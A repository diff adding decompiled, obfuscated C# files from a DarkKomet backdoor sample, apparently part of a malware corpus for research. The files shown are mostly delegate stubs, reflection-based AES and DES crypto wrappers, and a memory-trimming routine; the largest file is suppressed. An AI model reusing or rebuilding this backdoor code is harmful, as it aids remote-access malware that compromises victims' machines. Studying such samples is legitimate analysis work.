// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate void \u0010\u0003([In] object obj0, [In] UnhandledExceptionEventHandler obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0010_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate void \u0010\u0004([In] object obj0, [In] long obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0011_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate bool \u0011\u0003([In] string obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0011_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.IO;
using System.Runtime.InteropServices;
internal delegate long \u0011\u0004([In] object obj0, [In] long obj1, [In] SeekOrigin obj2);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0012/_0011.cs
+104
View File
@@ -0,0 +1,104 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u007F\u0004;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace \u0012
{
internal sealed class \u0011 : IDisposable
{
private readonly Type \u0001;
private readonly object \u0002;
public \u0011()
{
Assembly assembly1;
try
{
try
{
assembly1 = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e");
this.\u0001 = assembly1.GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
assembly1 = Assembly.Load("mscorlib");
this.\u0001 = assembly1.GetType("System.Security.Cryptography.RijndaelManaged");
}
this.\u0002 = Activator.CreateInstance(this.\u0001);
}
catch (Exception ex)
{
Assembly assembly2 = assembly1;
\u0089\u0004.\u0019\u0005(ex, (object) assembly2, (object) this);
throw;
}
}
public ICryptoTransform \u0007\u0002([In] byte[] obj0, [In] byte[] obj1, [In] bool obj2)
{
object[] objArray1;
MethodInfo method;
try
{
MethodInfo setMethod1 = this.\u0001.GetProperty("Key").GetSetMethod();
object obj3 = this.\u0002;
objArray1 = new object[1]{ (object) obj0 };
object[] parameters1 = objArray1;
setMethod1.Invoke(obj3, parameters1);
MethodInfo setMethod2 = this.\u0001.GetProperty("IV").GetSetMethod();
object obj4 = this.\u0002;
objArray1 = new object[1]{ (object) obj1 };
object[] parameters2 = objArray1;
setMethod2.Invoke(obj4, parameters2);
method = this.\u0001.GetMethod(obj2 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]);
return (ICryptoTransform) method.Invoke(this.\u0002, new object[0]);
}
catch (Exception ex)
{
MethodInfo methodInfo = method;
object[] objArray2 = objArray1;
byte[] numArray1 = obj0;
byte[] numArray2 = obj1;
// ISSUE: variable of a boxed type
__Boxed<bool> local = (ValueType) obj2;
\u0089\u0004.\u001D\u0005(ex, (object) methodInfo, (object) objArray2, (object) this, (object) numArray1, (object) numArray2, (object) local);
throw;
}
}
public void \u0008\u0002()
{
try
{
this.\u0001.GetMethod("Clear").Invoke(this.\u0002, new object[0]);
}
catch (Exception ex)
{
\u0089\u0004.\u0018\u0005(ex, (object) this);
throw;
}
}
public void Dispose()
{
try
{
this.\u0008\u0002();
}
catch (Exception ex)
{
\u0089\u0004.\u0018\u0005(ex, (object) this);
throw;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0012/_0013.cs
+95
View File
@@ -0,0 +1,95 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u007F\u0004;
using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace \u0012
{
internal sealed class \u0013 : IDisposable
{
private readonly Type \u0001;
private readonly object \u0002;
public \u0013()
{
Assembly assembly1;
try
{
assembly1 = Assembly.Load("mscorlib");
this.\u0001 = assembly1.GetType("System.Security.Cryptography.DESCryptoServiceProvider");
this.\u0002 = Activator.CreateInstance(this.\u0001);
}
catch (Exception ex)
{
Assembly assembly2 = assembly1;
\u0089\u0004.\u0019\u0005(ex, (object) assembly2, (object) this);
throw;
}
}
public ICryptoTransform \u000E\u0002([In] byte[] obj0, [In] byte[] obj1, [In] bool obj2)
{
object[] objArray1;
MethodInfo method;
try
{
MethodInfo setMethod1 = this.\u0001.GetProperty("Key").GetSetMethod();
object obj3 = this.\u0002;
objArray1 = new object[1]{ (object) obj0 };
object[] parameters1 = objArray1;
setMethod1.Invoke(obj3, parameters1);
MethodInfo setMethod2 = this.\u0001.GetProperty("IV").GetSetMethod();
object obj4 = this.\u0002;
objArray1 = new object[1]{ (object) obj1 };
object[] parameters2 = objArray1;
setMethod2.Invoke(obj4, parameters2);
method = this.\u0001.GetMethod(obj2 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]);
return (ICryptoTransform) method.Invoke(this.\u0002, new object[0]);
}
catch (Exception ex)
{
MethodInfo methodInfo = method;
object[] objArray2 = objArray1;
byte[] numArray1 = obj0;
byte[] numArray2 = obj1;
// ISSUE: variable of a boxed type
__Boxed<bool> local = (ValueType) obj2;
\u0089\u0004.\u001D\u0005(ex, (object) methodInfo, (object) objArray2, (object) this, (object) numArray1, (object) numArray2, (object) local);
throw;
}
}
public void \u0008\u0002()
{
try
{
this.\u0001.GetMethod("Clear").Invoke(this.\u0002, new object[0]);
}
catch (Exception ex)
{
\u0089\u0004.\u0018\u0005(ex, (object) this);
throw;
}
}
public void Dispose()
{
try
{
this.\u0008\u0002();
}
catch (Exception ex)
{
\u0089\u0004.\u0018\u0005(ex, (object) this);
throw;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0012/_0014.cs
+4051
View File
File diff suppressed because it is too large Load Diff
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0012_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate byte \u0012\u0003([In] int obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0012_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate int \u0012\u0004([In] object obj0, [In] byte[] obj1, [In] int obj2, [In] int obj3);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0013_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate int \u0013\u0003([In] long obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0013_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate void \u0013\u0004([In] object obj0, [In] byte[] obj1, [In] int obj2, [In] int obj3);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0014_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate int \u0014\u0003([In] string obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0014_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate void \u0014\u0004([In] object obj0, [In] byte obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0015_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate string \u0015\u0003([In] byte[] obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0015_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.IO;
using System.Runtime.InteropServices;
internal delegate DirectoryInfo \u0015\u0004([In] string obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0016_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate byte[] \u0016\u0003([In] string obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0016_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.IO;
using System.Runtime.InteropServices;
internal delegate FileStream \u0016\u0004([In] string obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0017_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate void \u0017\u0003([In] int obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0017_0004.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
internal delegate string \u0017\u0004();
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0018_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
internal delegate Version \u0018\u0003();
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0018_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate void \u0018\u0004([In] Array obj0, [In] RuntimeFieldHandle obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0019_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
internal delegate OperatingSystem \u0019\u0003();
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0019_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Reflection.Emit;
using System.Runtime.InteropServices;
internal delegate void \u0019\u0004([In] object obj0, [In] OpCode obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_001A_0002.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate void \u001A\u0002([In] object obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_001A_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate void \u001A\u0003([In] object obj0, [In] object obj1, [In] EventArgs obj2);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_001A_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Reflection.Emit;
using System.Runtime.InteropServices;
internal delegate void \u001A\u0004([In] object obj0, [In] OpCode obj1, [In] int obj2);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_001A_0006/_0019_0006.cs
+137
View File
@@ -0,0 +1,137 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u001A\u0006;
using \u007F\u0004;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System.Xml.Serialization;
namespace \u001A\u0006
{
internal class \u0019\u0006
{
private static \u0019\u0006 \u0001;
private long \u0002;
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u0006\u0002(
[XmlElement(DataType = "base64Binary")] IntPtr process,
int minimumWorkingSetSize,
int maximumWorkingSetSize);
private void \u0006\u0002()
{
Process currentProcess;
try
{
try
{
currentProcess = Process.GetCurrentProcess();
try
{
\u0019\u0006.\u0006\u0002(currentProcess.Handle, -1, -1);
}
finally
{
currentProcess?.Dispose();
}
}
catch
{
}
}
catch (Exception ex)
{
Process process = currentProcess;
\u0089\u0004.\u0019\u0005(ex, (object) process, (object) this);
throw;
}
}
private void \u0006\u0002(object sender, EventArgs e)
{
DateTime dateTime;
long ticks;
try
{
try
{
DateTime now = DateTime.Now;
if (true)
goto label_4;
label_1:
ticks = dateTime.Ticks;
if (ticks - this.\u0002 <= 10000000L)
return;
this.\u0002 = ticks;
this.\u0006\u0002();
return;
label_4:
dateTime = now;
goto label_1;
}
catch
{
}
}
catch (Exception ex)
{
// ISSUE: variable of a boxed type
__Boxed<long> local1 = (ValueType) ticks;
// ISSUE: variable of a boxed type
__Boxed<DateTime> local2 = (ValueType) dateTime;
object obj = sender;
EventArgs eventArgs = e;
\u0089\u0004.\u001C\u0005(ex, (object) local1, (object) local2, (object) this, obj, (object) eventArgs);
throw;
}
}
private \u0019\u0006()
{
DateTime now = DateTime.Now;
this.\u0002 = now.Ticks;
// ISSUE: explicit constructor call
base.\u002Ector();
try
{
Application.Idle += new EventHandler(this.\u0006\u0002);
this.\u0006\u0002();
}
catch (Exception ex)
{
// ISSUE: variable of a boxed type
__Boxed<DateTime> local = (ValueType) now;
\u0089\u0004.\u0019\u0005(ex, (object) local, (object) this);
throw;
}
}
public static void \u0005\u0002()
{
try
{
try
{
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
return;
\u0019\u0006.\u0001 = new \u0019\u0006();
}
catch
{
}
}
catch (Exception ex)
{
\u0089\u0004.\u0017\u0005(ex);
throw;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_001B_0002.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate void \u001B\u0002([In] object obj0, [In] string obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_001B_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate bool \u001B\u0003([In] Guid obj0, [In] Guid obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_001B_0004.cs
+11
View File
@@ -0,0 +1,11 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Reflection;
using System.Reflection.Emit;
using System.Runtime.InteropServices;
internal delegate void \u001B\u0004([In] object obj0, [In] OpCode obj1, [In] MethodInfo obj2);

Some files were not shown because too many files have changed in this diff Show More